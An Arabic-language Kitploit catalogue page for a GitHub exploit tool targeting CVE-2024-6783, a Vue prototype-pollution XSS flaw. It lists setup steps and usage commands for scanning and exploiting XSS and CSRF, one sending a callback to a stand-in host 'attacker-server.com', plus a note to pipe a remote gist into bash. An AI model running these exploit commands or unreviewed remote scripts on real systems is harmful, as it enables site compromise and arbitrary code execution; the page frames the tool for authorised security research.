Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
أدوات/GitHubGitHub/horkimhab/cve-2024-6783
تحليل الثغرات الأمنيةCTFالتعلم والتعليمموارد منسقةمسارات ودورات التعلممختبرات وتدريب عملي
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

عرض المستودع
3منذ شهر واحدلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-6783 - Vue CVE

تم اكتشاف ثغرة أمنية في Vue تسمح لمهاجم بتنفيذ XSS عبر تلويث النموذج الأولي (prototype pollution). يمكن للمهاجم تغيير سلسلة النموذج الأولي لبعض الخصائص مثل Object.prototype.staticClass أو Object.prototype.staticStyle لتنفيذ كود جافا سكريبت عشوائي.

تبرع

ادعم صيانة هذا المشروع عبر PayPal أو عن طريق مسح رمز QR أدناه.

paypal

QR code for donation

⚡ الاستخدام البسيط

استخدم هذا المشروع فقط في بيئات آمنة ومرخصة مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات المختبرات المعزولة
  • بيئات اختبار الاختراق المصرح بها

إعداد مثال:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# يستخدم المشروع بايثون كما يلي

# إنشاء بيئة افتراضية
python -m venv venv

# تفعيل البيئة الافتراضية

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# تثبيت المتطلبات
pip install -r requirements.txt

تنزيل الأداة

مثال على الاستخدام:

root@kitploit:~
# مسح فقط 
python cve-2024-6783.py -u https://example.com -v

# مسح واستغلال XSS 
python cve-2024-6783.py -u https://example.com -e xss

# استغلال XSS مع رد اتصال
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# خادم رد اتصال تلقائي
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# استغلال CSRF
python cve-2024-6783.py -u https://example.com -e csrf

# مسح واستغلال كامل مع إخراج مفصل
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

ملاحظة:

  • عند الاستنساخ من مشروع آخر، يجب تشغيل curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لإزالة دليل .git المتداخل
  • مثال: cve-2025-46822.sh، cve-2025-46822-lab.sh، ...

الإسناد أو المرجع

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 مستودع أبحاث أمنية تعليمي

مستودع لتعلم واختبار وبحث مفاهيم الأمن السيبراني في بيئات خاضعة للرقابة.


⚠️ إخلاء المسؤولية الأمني والقانوني

الغرض

هذا المستودع مخصص للأغراض التعليمية وأبحاث الأمن المصرح بها فقط.

صُمم لمساعدة المستخدمين على التعرف على:

  • الثغرات الأمنية
  • مفاهيم العزل والصندوق الرملي (sandbox)
  • ممارسات الترميز الآمن والدفاعي

الاستخدام المصرح به فقط

استخدم هذا المستودع فقط في بيئات لديك إذن بها، مثل:

  • المختبرات الشخصية أو الأجهزة الافتراضية
  • حاويات Docker أو البيئات المعزولة
  • اختبار الاختراق المصرح به
  • التدريب الأمني أو البحث الأكاديمي

الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.


عدم وجود مسؤولية

المؤلف والمساهمون غير مسؤولين عن أي ضرر أو سوء استخدام أو مشاكل قانونية أو خسائر ناتجة عن هذا المشروع.

باستخدامك لهذا المستودع، فإنك توافق على أن:

  • أنت مسؤول عن أفعالك
  • ستستخدمه بشكل قانوني وأخلاقي
  • المشروع يُقدم بدون ضمان

الاستخدام الأخلاقي

هذا المشروع مخصص من أجل:

  • البحث الأمني الدفاعي
  • التعليم في مجال الأمن السيبراني
  • الوعي بالثغرات
  • بحث النظم والبرمجيات الآمنة

يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.


الاتصال

للاستفسار عن الإفصاح المسؤول أو التعاون، اتصل بحارس المستودع عبر GitHub.